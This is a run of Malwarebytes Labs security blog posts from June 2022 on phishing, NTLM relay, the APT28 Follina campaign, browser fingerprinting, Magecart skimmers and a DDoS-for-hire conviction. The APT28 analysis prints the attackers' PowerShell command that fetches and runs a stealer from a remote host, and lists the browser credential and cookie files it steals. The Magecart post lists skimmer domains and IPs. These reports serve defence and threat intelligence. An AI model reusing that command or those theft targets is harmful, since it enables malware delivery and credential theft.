An email campaign lures users with a voicemail notification to enter their Office 365 credentials on a fake login page.
The post Watch out for the email that says “You have a new voicemail!” appeared first on Malwarebytes Labs.

A phishing campaign is using voicemail notification messages to go after victims’ Office 365 credentials.

According to researchers at ZScaler, the campaign uses spoofed emails with an HTML attachment that contains encoded javascript.

The email claims that you have a new voicemail and that you can listen to the message by clicking on the attachment. To add credibility, the name of the attachment starts with a music note character like f.e. ♫ to make it look like a sound clip. In reality, it is an HTML file with obfuscated javascript embedded.

The javascript uses the **windows.location.replace** method to redirect the target to a specially crafted phishing page. The access to the page is behind a reCAPTCHA, probably to keep out the bots, particularly any automated URL analysis tools.

**Spoofed email**

Email spoofing basically comes down to sending emails with a false sender address. This can be used in various ways by attackers. Obviously pretending to be someone else can have its advantages especially if that someone else holds a position of power or trust with regards to the receiver.

In this campaign the threat actors use a name in the “From” field of the email aligned with the targeted organization’s name. An internal mail is more likely to be trusted by the receiver. Analysis of the email headers shows that the attacker leveraged email servers located in Japan.

**Targets**

The final credential phishing page attempts to steal the Office 365 credentials of the users by presenting them with a fake login screen. The redirection URL includes the target’s email address in base64 encoded, likely so the attackers will be able to match the victim and their login credentials.

The researchers found the campaign targeting organizations in the US military, security software developers and providers, healthcare and pharmaceutical, and supply-chain organizations in manufacturing and shipping.

**How to avoid being phished**

*   Do not open unverified email attachments. If someone you know sends you an attachment you’re not expecting, check it is really them via another contact method.
*   Do not enter your credentials before checking the actual URL of the site.
*   If you use a password manager that autofills your login details, it will not enter your credentials on a phishing site because it will have a different URL. This is a really handy giveaway that something is up.
*   Enable 2-factor authentication (2FA). If you hand over your password to a phishing page, the phisher can’t do much with it while you’re protected with 2FA. This isn’t foolproof though, as some phishing sites will also try to steal your 2FA codes.

Stay safe, everyone!

Watch out for the email that says “You have a new voicemail!”

A researcher has posted a PoC for yet another NTLM relay attack method dubbed DFSCoerce. It is high time to retire NTLM. 
The post DFSCoerce, a new NTLM relay attack, can take control over a Windows domain appeared first on Malwarebytes Labs.

A researcher has published a Proof-of-Concept (PoC) for an NTLM relay attack dubbed DFSCoerce. The method leverages the Distributed File System: Namespace Management Protocol (MS-DFSNM) to seize control of a Windows domain.

**Active Directory**

A directory service is a hierarchical arrangement of objects which is structured in a way that makes access easy. Windows Active Directory (AD) is a directory service provided by Microsoft and developed for Windows domains. Basically, it is a central database which gets contacted before a user is granted access to a resource or a service. Organizations primarily use AD to perform authentication and authorization.

Many large organizations depend on Windows Active Directory (AD) to maintain order in the mountain of work involved in managing users, computers, permissions, and file servers.

**NTLM**

NTLM is short for New Technology LAN Manager. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN). NTLM is a protocol that uses a challenge and response method to authenticate a client.

1.  First, the client establishes a network path to the server and sends a NEGOTIATE\_MESSAGE advertising its capabilities.
2.  Next, the server responds with CHALLENGE\_MESSAGE which is used to establish the identity of the client.
3.  Finally, the client responds to the challenge with an AUTHENTICATE\_MESSAGE.

The NTLM protocol uses one or both of two hashed password values. Both passwords are also stored on the server (or domain controller). And through a lack of salting they are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

**NTLM relay attack**

NTLM relay attacks allow attackers to steal hashed versions of user passwords, and relay clients’ credentials in an attempt to authenticate to servers. They use a Machine-in-the-Middle method that allows threat actors to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to network resources.

PetitPotam is an example of an NTLM relay attack that prompted Microsoft to send out an advisory for system administrators to stop using the now deprecated Windows NT LAN Manager (NTLM) to thwart an attack. PetitPotam used the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) protocol to execute an NTLM attack.

The DFSCoerce script is based on the PetitPotam exploit, but instead of using MS-EFSRPC, it uses MS-DFSNM, a protocol that allows the Windows Distributed File System (DFS) to be managed over an remote procedure call (RPC) interface.

_Tweet by the researcher that discovered DFSCoerce_

**Other methods**

Other methods threat actors could use include the MS-RPRN, and the MS-FSRVP protocols. And now the researcher has added MS-DFSNM to the list of applicable protocols. A list which researchers expect to grow even more. The Distributed File System Namespace Management (DFSNM) protocol is one of a collection of protocols that group shares that are located on different servers by combining various storage media into a single logical namespace. The DFS namespace is a virtual view of the share. When a user views the namespace, the directories and files in it appear to reside on a single share.

**Mitigation**

While Microsoft has issued patches for NTLM attacks in the past, it is unclear whether it will do the same for DFSNM to thwart the DFSCoerce method.

The advice for system administrators is to follow Microsoft’s advisory on how to prevent NTLM relay attacks. The Microsoft advisory, triggered by PetitPotam, will also prevent DFSCoerce and other NTLM attack methods. The recommendation basically says to disable the deprecated NTLM authentication where possible and use the Extended Protection for Authentication (EPA). Extended Protection for Authentication helps protect against MITM attacks, in which an attacker intercepts a client’s credentials and forwards them to a server.

Stay safe, everyone!

DFSCoerce, a new NTLM relay attack, can take control over a Windows domain

Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.

_This blog post was authored by Hossein Jazi and Roberto Santos_.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

**The malicious document**

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_” published on May 10 this year.

The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

    "C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

**Payload Analysis**

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.

**Google Chrome and Microsoft Edge**

The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

**Firefox**

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Sysmon capturing access to cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

Attackers will grab also passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite, key3.db and cert8.db are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

**Exfiltrating data**

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

The IMAP login event

The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion.

**Protection**

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

**IOCs**

**Maldoc:  
**Nuclear Terrorism A Very Real Threat.rtf  
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

**Remote template (Follina):  
**http://kitten-268.frge\[.\]io/article.html

**Stealer:  
**http://kompartpomiar\[.\]pl/grafika/docx.exe  
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

**C2:  
**www.specialityllc\[.\]com

Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine

We look at a new project which uses several techniques to determine which Chrome extensions are being used on a device.
The post You can be tracked online using your Chrome browser extensions appeared first on Malwarebytes Labs.

Posted: June 21, 2022 by

A researcher has found a way to generate a fingerprint of your device from your installed Google Chrome extensions, and then use that fingerprint to track you online.

Fingerprinting is a way of figuring out what makes your device unique and then using that to identify you as you move around the internet. Websites you visit receive a huge amount of information when you land on their portal—it’s a lot more than “just” which web browser you use to load up someone’s site.

What extensions do you have? How does your screen resolution compare with others? If you use a specific, unusual resolution, do you run other extensions alongside it? Do other people? Which versions of those extensions are on board? Is your IP address plain and exposed, or hidden behind a VPN?

**How do sites fingerprint my device?**

You can see a typical voluntary form of fingerprinting testing here. The site checks for a variety of information related to your device (including the below), and then places a cookie on your PC for four months:

*   the User agent header
*   the Accept header
*   the Connection header
*   the Encoding header
*   the Language header
*   the Upgrade Insecure Requests header
*   the Referer header
*   the Cache-Control header
*   the BuildId of the browser
*   the list of plugins
*   the platform
*   the cookies preferences (allowed or not)
*   the Do Not Track preferences (yes, no or not communicated)
*   the timezone
*   the screen resolution and its color depth

What you often see in tests like this is a high degree of similarity between users for things like content encoding, preference for secure HTTPs requests, supported video formats, and so on.

The numbers start to flatten out for aspects of your PC like plugins, adblocker use, media devices plugged in, and lists of fonts. As you can see, it’s not just that fingerprinting can tell you what browser you use or your screen resolution at a very basic level, it’s all of the additional components too.

There’s lots of ways fingerprinting can provide a very in-depth profile of a device.

You may use one type of browser like 50% of the other people who had their system fingerprinted. However, only 5% may use a specific version of that browser. Of that 5%, only 2% have a certain extension installed. From there, only 0.3% may use a specific _version_ of this extension. And so it goes on…

Even switching your browsers around may not help much, which leads to people coming up with all sorts of workarounds.

**Running the gauntlet of web accessible resources**

The site determines installed extensions thanks to something called “web accessible resources”. As the researcher explains:

> _Web-accessible resources are files inside an extension that can be accessed by web pages or other extensions. Extensions typically use this feature to expose images or other assets that need to be loaded in web pages, but any asset included in an extension’s bundle can be made web accessible._
> 
> _By default no resources are web accessible; only pages or scripts loaded from an extension’s origin can access that extension’s resources. Extension authors can use the web\_accessible\_resources manifest property to declare which resources are exposed and to what origins._
> 
> A webpage can successfully fetch an installed extensions web accessible resource. If the fetch fails it usually means that the extension is not installed.

Visiting the checker site returns a list of potential Chrome extensions, and each entry has a True/False detection flag. In my case, it correctly reported the installed extensions on the test system and informed me what % of users _share_ those extensions.

The project creator explains that the detection does not work for Firefox as “Firefox extension IDs are unique for every browser instance”. They go on to say that the site “only detects extensions from the Chrome web store. Extensions for \[Microsoft Edge\] can be detected using the same methods but are not supported by this tool”.

**Tackling evasive behaviour**

Some extensions have ways of not showing up in this kind of fingerprinting test. Are some of the extensions on your device trying to hide? Thanks to something called “Resource timing comparison”, it may not even matter.

> _In an effort to prevent detection some extensions will generate a secret token thats required to access their web accessible resources. Any fetch operation made without the secret token will result in failure. Although its much more difficult to detect these protected extensions, it’s still possible._
> 
> _Resources of protected extensions will take longer to fetch than resources of extensions that are not installed. By comparing the timing differences you can accurately determine if the protected extensions are installed._

**Avoiding fingerprinting**

There’s numerous suggestions for this, but not all of them may be practical for you in your day to day dealings. Suggestions from the Electronic Frontier Foundation include:

*   Using a “non-rare” browser, with the caveat that aspects such as fonts and plugins can easily make you identifiable.
*   Disabling JavaScript, with the additional caveat that this may break functionality for most websites.
*   Making use of the private browsing modes included in most web browsers.

You could also use browsers with dedicated anti-fingerprinting technology running in the background. Whatever you decide, this is by no means an easy problem to address for most people.

**RELATED ARTICLES**

February 3, 2021 - Browser synchronization is a handy feature but it comes with a few risks. Here's what you should be asking yourself before you switch it on.

September 19, 2019 - The free Malwarebytes Browser Guard extension combats privacy abuse, user tracking, clickbait, unwanted advertisements, and tech support scammers while offering granular control and faster browsing.

June 10, 2019 - A weekly roundup of security news from June 3–9, including Magecart, breaches, hyperlink auditing, Bluekeep, FTC, and facial recognition.

June 6, 2019 - Hyperlink auditing is not a new way to track website users, but it could become more popular, as many browsers are taking away user options to disable it.

November 7, 2018 - Google now requires users to enable JavaScript before logging in for extra security measures. But wait, hasn't JavaScript been used in cyberattacks? We take a look at the impact of Google's decision.

You can be tracked online using your Chrome browser extensions

In this post, we break down 5 times hackers used security vulnerabilities in 2021 to attack governments and businesses.
The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.

Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit.

According to research by BetterCloud, the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.

Coupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it’s not surprising that businesses and governments are struggling to keep up with the volume of security vulnerabilities and patches.

And lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit multiple security vulnerabilities in 2021.

In this post, we’ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.

**1.   APT41 exploits Log4Shell vulnerability to compromise at least two US state governments**

First publicly announced in early December 2021, Log4shell (CVE-2021-44228) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform remote code execution.

A patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it — and at least one of them was successful.

Shortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from Mandiant. Once they gained access to internet-facing systems, APT41 began a months-long campaign of reconnaissance and credential harvesting.

**2.  North Korean government backed-groups exploit Chrome zero-day vulnerability**

On February 10 2022, Google’s Threat Analysis Group (TAG) discovered that two North Korean government backed-groups exploited a vulnerability (**CVE-2022-0609**) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.

The activities of the two groups have been tracked as Operation Dream Job and AppleJeus, and both of them used the same exploit kit to collect sensitive information from affected systems.

How does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome — which, just like Log4Shell, allows hackers to perform remote code execution.

**3.  Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability**

From September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by exploiting a vulnerability **(CVE-20****2****1-40539)** in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution.

So, what happens after hackers exploited this vulnerability? You guessed it — remote code execution. Specifically, hackers uploaded a payload to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.

From there, hackers moved laterally to other systems on the network, exfiltrated any files they pleased, and even stole credentials.

**4.  Tallinn-based hacker exploits Estonian government platform security vulnerabilities**

In July 2021, Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia’s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.

To do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person’s ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received — and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.

**5.  Russian hackers exploit Kaseya security vulnerabilities**

Kaseya, a Miami-based software company, provides tech services to thousands of businesses over the world — and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: shut down your servers immediately.

The urgency was warranted. Over 1,500 small and midsize businesses had just been attacked, with attackers asking for $70 million in payment.

A Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil exploited a zero-day (CVE-2021-30116) and performed an authentication bypass in Kaseya’s web interface — allowing them to deploy a ransomware attack on MSPs and their customers.

**Organizations need a streamlined approach to vulnerability assessment**

Hackers took advantage of many security vulnerabilities in 2021 to breach an array of governments and businesses.

As we broke down in this article, hackers can range from individuals to whole state-sponsored groups — and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.

And while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right vulnerability management and patch management, however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.

Want to learn more about different vulnerability and patch management tools? Visit our Vulnerability and Patch Management page or read the solution brief.

Security vulnerabilities: 5 times that organizations got hacked

While we have heard less about web skimming attacks, attacks are still going on, but more quietly than before.
The post Client-side Magecart attacks still around, but more covert appeared first on Malwarebytes Labs.

_This blog post was authored by Jérôme Segura_

We have seen and heard less buzz about ‘Magecart’ during the past several months. While some companies continue to rehash the same breaches of yesteryear, we have been wondering if some changes took place in the threat landscape.

One thing we know is that if the Magecart threat actors decided to switch their operations exclusively server-side then the majority of companies, including ours, would lose visibility overnight. This is why we often look up to researchers that work the website cleanups. If something happens, these guys would likely notice it.

We followed the trail on two recent reports that proved to be worthwhile. It allowed us to make a connection to a previous campaign and identify new pieces of a pretty wide infrastructure.

For now we can say that Magecart client-side attacks are still around and that we could easily be missing them if we rely on automated crawlers and sandboxes, at least if we don’t make them more robust.

**Newly reported domains linked with ‘anti-VM’ skimmer**

On June 12, @rootprivilege tweeted about a hacked stored injected with the host js.staticounter\[.\]net that looked highly suspicious. When originally captured, the JavaScript appeared to be clean but it was confirmed to be malicious by @AffableKraut who posted a screenshot of the skimmer code.

A few days before @rootprivilege posted about this skimmer, @Sansec tweeted about another new skimmer domain at scanalytic\[.\]org. Comparing the two which are both on the same ASN (AS29182), we concluded that they are related.

We were able to connect these 2 domains with a previous campaign from November 2021 which was the first instance to our knowledge of a skimmer checking for the use of virtual machines. However, both of them are now devoid of VM detection code. It’s unclear why the threat actors removed it, unless perhaps it caused more issues than benefits.

There are other differences with the newest skimmer sample from @rootsecdev such as different naming schemes for important input fields. As you can see, in the former case these are explicitly referenced (i.e. CcNumber) while in the later iteration the names are generic web terms, making them less obvious.

**Additional infrastructure**

Using the urlscan.io service, we were able to discover additional infrastructure related to this ongoing campaign. We started our search with any recent submissions that made contact with an IP address belonging to AS29182.

The table below shows hostnames, their IP address and the date they were first seen on urlscan.io. Most of those were previously unknown to us until we recently started this investigation. You can click on the hyperlinks to load the corresponding sandbox pages, but note that a majority of them do not contain the actual skimmer code. This is most likely because the malicious infrastructure detected that urlscan.io’s sandbox was not using genuine residential IP addresses.

**Hostname**

**IP address**

**First seen**

app\[.\]nomalert\[.\]org

185.253.32.64

Nov 30, 2021

cdn\[.\]base-code\[.\]org

185.253.32.59

Jan 30, 2022

web\[.\]dwin-co\[.\]jp

185.253.32.44

Feb 3, 2022

dwin1\[.\]org

185.253.33.40

Feb 22, 2022

trustedport\[.\]org

185.253.32.50

March 4, 2022

h\[.\]lookmind\[.\]net

185.253.32.42

March 17, 2022

web\[.\]speedstester\[.\]com

185.253.33.191

March 25, 2022

search\[.\]global-search\[.\]net

185.253.33.188

April 13, 2022

static\[.\]clarlity\[.\]com

185.253.33.179

April 20, 2022

static\[.\]newrelc\[.\]net

185.63.190.207

April 22, 2022

static\[.\]druapps\[.\]org

185.63.190.183

May 26, 2022

js\[.\]imagero\[.\]org

185.63.190.144

May 27, 2022

common\[.\]quatserve\[.\]com

185.63.190.118

May 30, 2022

static\[.\]lookmetric\[.\]com

185.63.190.163

June 3, 2022

cdn\[.\]boxsearch\[.\]org

185.63.190.205

June 11, 2022

**Validating skimmer activity**

For the domains that are still responding, we can use information collected by urlscan.io and replay the attack using a genuine residential IP address and mimicking a real shopper’s experience. The image below shows the difference between a crawler session via VPN and one done manually with real network settings.

This allows us to confirm beyond doubt that the domains are indeed malicious, although their ASN should already be enough to proactively block them.

**Connection with previous skimmer activity**

Based on one hash, we can connect these skimmers to past activity going back to at least May 2020. One of the hostnames from our previous blog on the anti-vm skimmer, con\[.\]digital-speed\[.\]net, was loading this resource as well.

We can see 3 different themes used by the threat actor to hide their skimmer, named after JavaScript libraries:

*   hal-data\[.\]org/gre/code.js (Angular JS)
*   hal-data\[.\]org/data/ (Logger)
*   js.g-livestatic\[.\]com/theme/main.js (Modernizr)

**Less skimmer activity or simply more covert?**

There are likely many more skimmer domains on the infrastructure we detailed above, and it is a good idea to keep a close eye on it. Having said that, we have generally seen less skimming attacks during the past several months. Perhaps we have been too focused on the Magento CMS, or our crawlers and sandboxes are being detected because of various checks including at the network level.

As Ben Martin over at Sucuri showed, WordPress with the WooCommerce plugin is outpacing Magento in terms of attacks. In addition, we (as several other companies) can only observe client-side attacks and as such we are oblivious to what happens server-side. Only a handful of researchers who do website cleanups have the visibility into PHP-based skimmers.

While stealing credit cards is still a good business, there are other types of data considerably more worth it. Crypto wallets and similar digital assets are extremely valuable and there is no doubt that clever schemes to rob those are in place beyond phishing for them. For an example of a client-side attack via JavaScript draining crypto assets, check out this blog from Eliya Stein over at Confiant.

Malwarebytes customers are protected against this campaign.

**Indicators of Compromise**

**Skimmer domains**

abtasty\[.\]net  
accdn\[.\]lpsnmedia\[.\]org  
amplify\[.\]outbrains\[.\]net  
apis\[.\]murdoog\[.\]org  
app\[.\]iofrontcloud\[.\]com  
app\[.\]nomalert\[.\]org  
app\[.\]purechat\[.\]org  
app\[.\]rolfinder\[.\]com  
cdn\[.\]accutics\[.\]org  
cdn\[.\]alexametrics\[.\]net  
cdn\[.\]alligaturetrack\[.\]com  
cdn\[.\]base-code\[.\]org  
cdn\[.\]boxsearch\[.\]org  
cdn\[.\]cookieslaw\[.\]org  
cdn\[.\]getambassador\[.\]net  
cdn\[.\]hs-analytics\[.\]org  
cdn\[.\]jsdelivr\[.\]biz  
cdn\[.\]nosto\[.\]org  
cdn\[.\]pinnaclecart\[.\]io  
cdn\[.\]speedcurve\[.\]org  
cdn\[.\]tomafood\[.\]org  
clickcease\[.\]biz  
common\[.\]quatserve\[.\]com  
con\[.\]digital-speed\[.\]net  
content\[.\]digital-metric\[.\]org

css\[.\]tevidon\[.\]com  
demo-metrics\[.\]net  
dev\[.\]crisconnect\[.\]net  
dwin1\[.\]org  
epos\[.\]bayforall\[.\]biz  
feedaty\[.\]org  
graph\[.\]cloud-chart\[.\]net  
h\[.\]lookmind\[.\]net  
hal-data\[.\]org  
img\[.\]etakeawaymax\[.\]biz  
js\[.\]artesfut\[.\]com  
js\[.\]g-livestatic\[.\]com  
js\[.\]imagero\[.\]org  
js\[.\]librarysetr\[.\]com  
libsconnect\[.\]net  
listrakbi\[.\]io  
lp\[.\]celebrosnlp\[.\]org  
m\[.\]brands-watch\[.\]com  
m\[.\]sleeknote\[.\]org  
marklibs\[.\]com  
nypi\[.\]dc-storm\[.\]org  
opendwin\[.\]com  
pepperjams\[.\]org  
px\[.\]owneriq\[.\]org

r\[.\]klarnacdn\[.\]org  
rawgit\[.\]net  
rolfinder\[.\]com  
s1\[.\]listrakbi\[.\]org  
sdk\[.\]moonflare\[.\]org  
search\[.\]global-search\[.\]net  
shopvisible\[.\]org  
sjsmartcontent\[.\]org  
snapengage\[.\]io  
st\[.\]adsrvr\[.\]biz  
stage\[.\]sleefnote\[.\]com  
stat-analytics\[.\]org  
static\[.\]clarlity\[.\]com  
static\[.\]druapps\[.\]org  
static\[.\]lookmetric\[.\]com  
static\[.\]mantisadnetwork\[.\]org  
static\[.\]newrelc\[.\]net  
static\[.\]opendwin\[.\]com  
t\[.\]trackedlink\[.\]org  
troadster\[.\]com  
trustedport\[.\]org  
web\[.\]dwin-co\[.\]jp  
web\[.\]livechatsinc\[.\]net  
web\[.\]speedstester\[.\]com  
web\[.\]webflows\[.\]net

  
**Skimmer IPs**

185.253.32.174  
185.253.32.42  
185.253.32.44  
185.253.32.50  
185.253.32.59  
185.253.32.64  
185.253.33.179  
185.253.33.188  
185.253.33.191  
185.253.33.40  
185.63.188.59  
185.63.188.70  
185.63.188.71  
185.63.188.79  
185.63.188.85  
185.63.190.118

185.63.190.144  
185.63.190.163  
185.63.190.183  
185.63.190.205  
185.63.190.207  
185.63.190.212  
194.87.217.195  
194.87.217.197  
194.87.217.91  
212.109.222.225  
77.246.157.133  
80.78.249.78  
82.146.50.89  
82.146.50.132  
82.202.160.10  
82.202.160.119

82.202.160.123  
82.202.160.137  
82.202.160.29  
82.202.160.54  
82.202.160.8  
82.202.160.9  
82.202.161.77  
89.108.109.14  
89.108.109.167  
89.108.109.169  
89.108.116.123  
89.108.116.48  
89.108.123.168  
89.108.123.169  
89.108.123.28  
89.108.126.50  
89.108.127.16

Client-side Magecart attacks still around, but more covert

Vacationing has never been more welcome. But as you plan your itinerary, make sure your devices are secure and your data stays private.
The post Internet Safety Month: 7 tips for staying safe online while on vacation appeared first on Malwarebytes Labs.

Going on vacation has never been more talked about and anticipated. I mean—for many of us, it’s been a while.

But before you get lost in dreamy thoughts of sun, sea, and sand, you might want to set aside some time to plan on how to keep your devices, and your data, safe while you are relaxing

**Your devices need some prepping, too**

Before anything else, know which devices you’ll bring and which ones you’ll leave at home. Then make backups of the files in them.

This is also the perfect time to look deeper into what’s on your devices, especially if you haven’t done any spring cleaning due to busyness. So update those apps that need updating and uninstall those that waste space; scan your devices with a trusty malware scanner, and change any duplicate passwords. Then follow these tips:

**7 security and privacy tips that fit in your pocket**

**Ensure your devices have the “Find My Device” feature enabled.** This feature isn’t just limited to Apple products, and can really help if you lose your device. You can remotely wipe a device if you lose it or even put a message on the screen with contact details in case it is found.

**Be mindful of seasonal scams.** Such scams may arrive via email, SMS, or social media. If a service offers rates that are too good to be true, asks for an upfront fee, or demands payments to be wired, avoid it.

**Use 2FA.** Make sure you lock your accounts behind two-factor authentication (2FA). This additional security measure makes them harder to compromise should someone get hold of your login details.

**Turn off Bluetooth connectivity.** Many people forget Bluetooth is there. As a rule of thumb, remove it if you don’t use it. But if you can’t, disable it when it’s not in use.

**Leave your device in the hotel’s safe.** Hotel safes are there to keep anything of value safe. This includes your devices. When you’re not using a device, keep it in the safe—and remember the pin code!

**Refrain from posting on social media about your vacation.** This is good practice _before_ you leave as well. You don’t want people knowing that your home will be empty, so save posting about your getaway until you are back home.

**Feel free to use a VPN.** Hotel and airport Wi-Fi is safer now than years ago, thanks to HTTPS everywhere. But if you still can’t shake the feeling of being “exposed,” use a VPN you trust. Malwarebytes has one.

Internet Safety Month: 7 tips for staying safe online while on vacation

Matthew Gatrel has been found guilty of three counts of computer-related crime. His partner in crime, Juan "Severon" Martinez, pleaded guilty before the trial.
The post DDoS-for-hire service provider jailed appeared first on Malwarebytes Labs.

Matthew Gatrel, a 33-year-old man from St. Charles, Illinois, has been sentenced to two years in prison for running websites that provide powerful distributed denial-of-service (DDoS) attacks against internet users and websites. This sentencing resulted in the seizure of his websites, making the internet a little safer from DDoS attacks.

Gatrel was the administrator and owner of DownThem.org and AmpNode.com, two DDoS-for-hire websites with thousands of clients which launched attacks against more than 200,000 targets. He was convicted of three charges, including conspiracy to commit unauthorized impairment of a protected computer, conspiracy to commit wire fraud, and unauthorized impairment of a protected computer.

“Gatrel ran a criminal enterprise designed around launching hundreds of thousands of cyberattacks on behalf of hundreds of customers,” prosecutors wrote in a sentencing memorandum. More from that memorandum:

> “He also provided infrastructure and resources for other cybercriminals to run their own businesses launching these same kinds of attacks. These attacks victimized wide swaths of American society and compromised computers around the world.”

Prosecutors said that DownThem.org was a subscription-based service that allowed paying customers to launch DDoS attacks at targets of their choice.

AmpNode.com was a “bulletproof” server hosting service provider “with an emphasis on ‘spoofing’ servers that could be pre-configured with DDoS attack scripts and lists of vulnerable ‘attack amplifiers’ used to launch simultaneous cyberattacks on victims”.

Gatrel’s services helped launch attacks against targets worldwide, including homes, schools, universities, financial institutions, and local government websites. Many clients of AmpNode also operated DDoS-for-hire services.

This website seizure splash screen appears when you visit DownThem.

Prosecutors also said that Gatrel offered expert advice and guidance to clients of both services, ranging from different methods to “down” different types of computers to bypassing DDoS protection services. To get potential clients to buy in, he used DownThem to launch a DDoS attack against these clients’ intended victims and provide proof that their internet connection had been severed.

Juan “Severon” Martinez from Pasadena, California, Gatrel’s co-defendant and criminal partner, pleaded guilty to the unauthorized impairment of a protected computer. He was sentenced to five years’ probation.

DDoS-for-hire service provider jailed

The FBI has issued a warning about cryptocurrency scams on LinkedIn. We see what the scammers are up to and how you can avoid them.
The post LinkedIn scams are a “significant threat”, warns FBI appeared first on Malwarebytes Labs.

